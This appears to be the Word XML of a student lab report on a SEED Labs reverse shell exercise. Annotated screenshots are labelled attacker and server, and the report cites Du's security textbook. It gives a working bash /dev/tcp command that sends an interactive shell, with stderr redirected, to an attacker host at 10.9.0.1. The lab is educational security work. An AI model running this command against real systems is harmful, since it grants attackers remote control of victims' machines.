                    <w:p w14:paraId="59571880" w14:textId="77777777" w:rsidR="00164C3A" w:rsidRPr="00E9007E" w:rsidRDefault="00164C3A" w:rsidP="00164C3A">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="32"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="32"/>
                        </w:rPr>
                        <w:t>Redirected output</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00164C3A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383F682" wp14:editId="3620F29E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>740832</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1397423</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="630767" cy="80434"/>
                <wp:effectExtent l="0" t="76200" r="17145" b="53340"/>
                <wp:wrapNone/>
                <wp:docPr id="32" name="Straight Arrow Connector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30767" cy="80434"/>
                        </a:xfrm>
                        <a:prstGeom prst="straightConnector1">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="3810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24055EA" id="Straight Arrow Connector 32" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;margin-left:58.35pt;margin-top:110.05pt;width:49.65pt;height:6.35pt;flip:x y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" strokecolor="red" strokeweight="3pt">
                <v:stroke endarrow="block" joinstyle="miter"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00164C3A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060085E7" wp14:editId="29086746">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1316355</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1336040</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1134533" cy="491067"/>
                <wp:effectExtent l="0" t="0" r="0" b="4445"/>
                <wp:wrapNone/>
                <wp:docPr id="33" name="Text Box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34533" cy="49106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672D533" w14:textId="77777777" w:rsidR="00164C3A" w:rsidRPr="00E9007E" w:rsidRDefault="00164C3A" w:rsidP="00164C3A">
                            <w:pPr>
                              <w:rPr>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="32"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00E9007E">
                              <w:rPr>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="32"/>
                              </w:rPr>
                              <w:t>Typed he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60085E7" id="Text Box 33" o:spid="_x0000_s1038" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:103.65pt;margin-top:105.2pt;width:89.35pt;height:38.6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" filled="f" stroked="f" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6672D533" w14:textId="77777777" w:rsidR="00164C3A" w:rsidRPr="00E9007E" w:rsidRDefault="00164C3A" w:rsidP="00164C3A">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="32"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00E9007E">
                        <w:rPr>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="32"/>
                        </w:rPr>
                        <w:t>Typed here</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="001F14CA" w:rsidRPr="001F14CA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73AE98B" wp14:editId="426EB408">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4495165</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>712470</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="989965" cy="440055"/>
                <wp:effectExtent l="19050" t="19050" r="19685" b="17145"/>
                <wp:wrapNone/>
                <wp:docPr id="27" name="Text Box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89965" cy="4400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3810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010DA5BF" w14:textId="77777777" w:rsidR="001F14CA" w:rsidRPr="002F0796" w:rsidRDefault="001F14CA" w:rsidP="001F14C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32"/>
                                <w:szCs w:val="40"/>
                              </w:rPr>
                              <w:t>Attack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3AE98B" id="Text Box 27" o:spid="_x0000_s1039" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:353.95pt;margin-top:56.1pt;width:77.95pt;height:34.6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" fillcolor="white [3201]" strokecolor="red" strokeweight="3pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="010DA5BF" w14:textId="77777777" w:rsidR="001F14CA" w:rsidRPr="002F0796" w:rsidRDefault="001F14CA" w:rsidP="001F14CA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4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32"/>
                          <w:szCs w:val="40"/>
                        </w:rPr>
                        <w:t>Attacker</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00C127DC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w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EA8E154" wp14:editId="2BFD7B50">
            <wp:extent cx="5935345" cy="4216400"/>
            <wp:effectExtent l="0" t="0" r="825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4432"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5935345" cy="421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63FF604" w14:textId="2545A65D" w:rsidR="00084759" w:rsidRDefault="00364E35" w:rsidP="00AE65FB">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E959403" w14:textId="7EB17DE5" w:rsidR="00084759" w:rsidRDefault="00084759" w:rsidP="00084759">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto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lastRenderedPageBreak/>
        <w:tab/>
        <w:t xml:space="preserve">To complete reverse shell operation, I also redirected standard error. This will make the activities in server invisible but shown in attacker’s machine. </w:t>
      </w:r>
      <w:r w:rsidR="00B04BFD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The standard error redirection use</w:t>
      </w:r>
      <w:r w:rsidR="009B52D7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</w:t>
      </w:r>
      <w:r w:rsidR="00B04BFD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 </w:t>
      </w:r>
      <w:r w:rsidR="00B04BFD" w:rsidRPr="00EA7A1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the following server command (Figure </w:t>
      </w:r>
      <w:r w:rsidR="00EA7A1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13</w:t>
      </w:r>
      <w:r w:rsidR="00B04BFD" w:rsidRPr="00EA7A1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).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46ECEDEC" w14:textId="72B9BFF9" w:rsidR="00F43F14" w:rsidRPr="00F43F14" w:rsidRDefault="00F43F14" w:rsidP="00F43F14">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006816AA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/bin/bash -i &gt; /dev/tcp/10.9.0.1/9090 0&lt;&amp;1</w:t>
      </w:r>
      <w:r w:rsidR="006816AA" w:rsidRPr="006816AA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E89AC6" w14:textId="31017F3A" w:rsidR="009B52D7" w:rsidRPr="00F413ED" w:rsidRDefault="009B52D7" w:rsidP="009B52D7">
      <w:pPr>
        <w:spacing w:after="0" w:line="48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EA7A1C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00EA7A1C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54868DDF" w14:textId="49426944" w:rsidR="009B52D7" w:rsidRDefault="009B52D7" w:rsidP="009B52D7">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs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  <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Redirecting everything from server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FD8C3D" w14:textId="13CD25BB" w:rsidR="009B52D7" w:rsidRDefault="000A7C84" w:rsidP="009B52D7">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center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 w:rsidRPr="001F14CA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4953BDDC" wp14:editId="26497B5D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4613910</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>921596</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="990177" cy="440055"/>
                <wp:effectExtent l="19050" t="19050" r="19685" b="17145"/>
                <wp:wrapNone/>
                <wp:docPr id="40" name="Text Box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90177" cy="4400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3810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4041B63D" w14:textId="77777777" w:rsidR="009B52D7" w:rsidRPr="002F0796" w:rsidRDefault="009B52D7" w:rsidP="009B52D7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40"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="002F0796">
                              <w:rPr>
                                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                                <w:sz w:val="32"/>
                                <w:szCs w:val="40"/>
                              </w:rPr>
                              <w:t>Serv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53BDDC" id="Text Box 40" o:spid="_x0000_s1040" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:363.3pt;margin-top:72.55pt;width:77.95pt;height:34.6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" fillcolor="white [3201]" strokecolor="red" strokeweight="3pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4041B63D" w14:textId="77777777" w:rsidR="009B52D7" w:rsidRPr="002F0796" w:rsidRDefault="009B52D7" w:rsidP="009B52D7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40"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="002F0796">
                        <w:rPr>
                          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                          <w:sz w:val="32"/>
                          <w:szCs w:val="40"/>
                        </w:rPr>
                        <w:t>Server</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="001F14CA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73E3346" wp14:editId="429E88DF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4529031</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2617470</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="989965" cy="440055"/>
                <wp:effectExtent l="19050" t="19050" r="19685" b="17145"/>
                <wp:wrapNone/>
                <wp:docPr id="45" name="Text Box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89965" cy="44005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38100">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="6B5161AE" w14:textId="77777777" w:rsidR="009B52D7" w:rsidRPr="002F0796" w:rsidRDefault="009B52D7" w:rsidP="009B52D7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32"/>
                                <w:szCs w:val="40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32"/>
                                <w:szCs w:val="40"/>
                              </w:rPr>
                              <w:t>Attack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3E3346" id="Text Box 45" o:spid="_x0000_s1041" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:356.6pt;margin-top:206.1pt;width:77.95pt;height:34.6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" fillcolor="white [3201]" strokecolor="red" strokeweight="3pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6B5161AE" w14:textId="77777777" w:rsidR="009B52D7" w:rsidRPr="002F0796" w:rsidRDefault="009B52D7" w:rsidP="009B52D7">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                          <w:sz w:val="32"/>
                          <w:szCs w:val="40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32"/>
                          <w:szCs w:val="40"/>
                        </w:rPr>
                        <w:t>Attacker</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00164C3A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0F559367" wp14:editId="2B22D7BB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4506383</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3843867</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="319617" cy="192616"/>
                <wp:effectExtent l="38100" t="19050" r="23495" b="55245"/>
                <wp:wrapNone/>
                <wp:docPr id="41" name="Straight Arrow Connector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319617" cy="192616"/>
                        </a:xfrm>
                        <a:prstGeom prst="straightConnector1">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="3810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A49CF4" id="Straight Arrow Connector 41" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;margin-left:354.85pt;margin-top:302.65pt;width:25.15pt;height:15.15pt;flip:x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" strokecolor="red" strokeweight="3pt">
                <v:stroke endarrow="block" joinstyle="miter"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00164C3A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FF87DDC" wp14:editId="0F308644">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2755265</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2504440</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1134110" cy="490855"/>
                <wp:effectExtent l="0" t="0" r="0" b="4445"/>
                <wp:wrapNone/>
                <wp:docPr id="44" name="Text Box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34110" cy="49085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AC46CFB" w14:textId="77777777" w:rsidR="009B52D7" w:rsidRPr="00E9007E" w:rsidRDefault="009B52D7" w:rsidP="009B52D7">
                            <w:pPr>
                              <w:rPr>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="32"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00E9007E">
                              <w:rPr>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="32"/>
                              </w:rPr>
                              <w:t>Typed her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FF87DDC" id="Text Box 44" o:spid="_x0000_s1042" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:216.95pt;margin-top:197.2pt;width:89.3pt;height:38.65pt;z-index:2516920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" filled="f" stroked="f" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6AC46CFB" w14:textId="77777777" w:rsidR="009B52D7" w:rsidRPr="00E9007E" w:rsidRDefault="009B52D7" w:rsidP="009B52D7">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="32"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00E9007E">
                        <w:rPr>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="32"/>
                        </w:rPr>
                        <w:t>Typed here</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00164C3A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2A929C69" wp14:editId="1A93065A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2179744</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2565400</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="630767" cy="80434"/>
                <wp:effectExtent l="0" t="76200" r="17145" b="53340"/>
                <wp:wrapNone/>
                <wp:docPr id="43" name="Straight Arrow Connector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30767" cy="80434"/>
                        </a:xfrm>
                        <a:prstGeom prst="straightConnector1">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="38100">
                          <a:solidFill>
                            <a:srgbClr val="FF0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BAFA9F" id="Straight Arrow Connector 43" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;margin-left:171.65pt;margin-top:202pt;width:49.65pt;height:6.35pt;flip:x y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" strokecolor="red" strokeweight="3pt">
                <v:stroke endarrow="block" joinstyle="miter"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="009B52D7" w:rsidRPr="00164C3A"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08588EC7" wp14:editId="5354004D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4478655</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3577590</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1489922" cy="491067"/>
                <wp:effectExtent l="0" t="0" r="0" b="4445"/>
                <wp:wrapNone/>
                <wp:docPr id="42" name="Text Box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9922" cy="49106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8C4E5DF" w14:textId="77777777" w:rsidR="009B52D7" w:rsidRPr="00E9007E" w:rsidRDefault="009B52D7" w:rsidP="009B52D7">
                            <w:pPr>
                              <w:rPr>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="32"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="32"/>
                              </w:rPr>
                              <w:t>Redirected outpu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8588EC7" id="Text Box 42" o:spid="_x0000_s1043" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:352.65pt;margin-top:281.7pt;width:117.3pt;height:38.65pt;z-index:2516940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" filled="f" stroked="f" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="78C4E5DF" w14:textId="77777777" w:rsidR="009B52D7" w:rsidRPr="00E9007E" w:rsidRDefault="009B52D7" w:rsidP="009B52D7">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="32"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="32"/>
                        </w:rPr>
                        <w:t>Redirected outpu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w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F58DF7A" wp14:editId="503A6357">
            <wp:extent cx="5943600" cy="1100667"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445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4806"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="11006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noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5946AEE4" wp14:editId="3E224D95">
            <wp:extent cx="5943280" cy="4055533"/>
            <wp:effectExtent l="0" t="0" r="635" b="254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167"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4055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CD8A75" w14:textId="5AB00B7C" w:rsidR="00AF1C35" w:rsidRPr="00364E35" w:rsidRDefault="00566066" w:rsidP="00695E55">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/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ab/>
        <w:t>This operation complete reverse shell, but it is just the beginning of what attacker can do. Other attacks can be perform using reverse shell in later Labs.</w:t>
      </w:r>
      <w:r w:rsidR="00084759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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9199FC" w14:textId="53F48C7E" w:rsidR="00C0195B" w:rsidRPr="005C7A5D" w:rsidRDefault="00AF1C35" w:rsidP="00F85ACF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C7A5D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540B129A" w14:textId="63B487F0" w:rsidR="00103495" w:rsidRPr="00C34785" w:rsidRDefault="00103495" w:rsidP="00103495">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C34785">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Du, W. (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00C34785">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Computer &amp; internet security: A hands-on approach </w:t>
      </w:r>
      <w:r w:rsidRPr="00C34785">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(2nd ed.). Independently published.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AD5639" w14:textId="03D9DD9F" w:rsidR="009C7503" w:rsidRPr="00C34785" w:rsidRDefault="002B607C" w:rsidP="002B607C">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="720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C34785">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Du, W. (2021, October 23). </w:t>
      </w:r>
      <w:r w:rsidRPr="00C34785">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>seed-labs/manuals/docker/</w:t>
      </w:r>
      <w:r w:rsidRPr="00C34785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. GitHub. </w:t>
      </w:r>
      <w:r w:rsidR="00E55088" w:rsidRPr="00C34785">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>https://github.com/seed-labs/seed-labs/tree/master/manuals/docker</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="009C7503" w:rsidRPr="00C34785" w:rsidSect="009A1729">
      <w:headerReference w:type="default" r:id="rId25"/>
      <w:pgSz w:w="12240" w:h="15840" w:code="1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6AF3570" w14:textId="77777777" w:rsidR="0033726D" w:rsidRDefault="0033726D" w:rsidP="001F5F65">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4FA283B7" w14:textId="77777777" w:rsidR="0033726D" w:rsidRDefault="0033726D" w:rsidP="001F5F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7CAA04" w14:textId="77777777" w:rsidR="0033726D" w:rsidRDefault="0033726D" w:rsidP="001F5F65">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4DA512A6" w14:textId="77777777" w:rsidR="0033726D" w:rsidRDefault="0033726D" w:rsidP="001F5F6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Fonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="32"/>
      </w:rPr>
      <w:id w:val="955919206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</w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="36EAE820" w14:textId="2EE98C01" w:rsidR="001F5F65" w:rsidRPr="009C3A1A" w:rsidRDefault="001F5F65">
        <w:pPr>
          <w:pStyle w:val="Header"/>
          <w:jc w:val="right"/>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="32"/>
          </w:rPr>
        </w:pPr>
        <w:r w:rsidRPr="009C3A1A">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="32"/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="009C3A1A">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="32"/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
        </w:r>
        <w:r w:rsidRPr="009C3A1A">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="32"/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="009C3A1A">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:noProof/>
            <w:sz w:val="24"/>
            <w:szCs w:val="32"/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidRPr="009C3A1A">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:noProof/>
            <w:sz w:val="24"/>
            <w:szCs w:val="32"/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="7FFD7187" w14:textId="77777777" w:rsidR="001F5F65" w:rsidRDefault="001F5F6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1F21C4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="35267FB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7D91973"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="01FC699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E334BF7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="32A66CB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20825373"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="61B48FB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25903932"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F2EABD4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39AE0473"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B24EE9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94C2E58"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="63EA87C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74DC7E31"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DD5A832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6"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6">
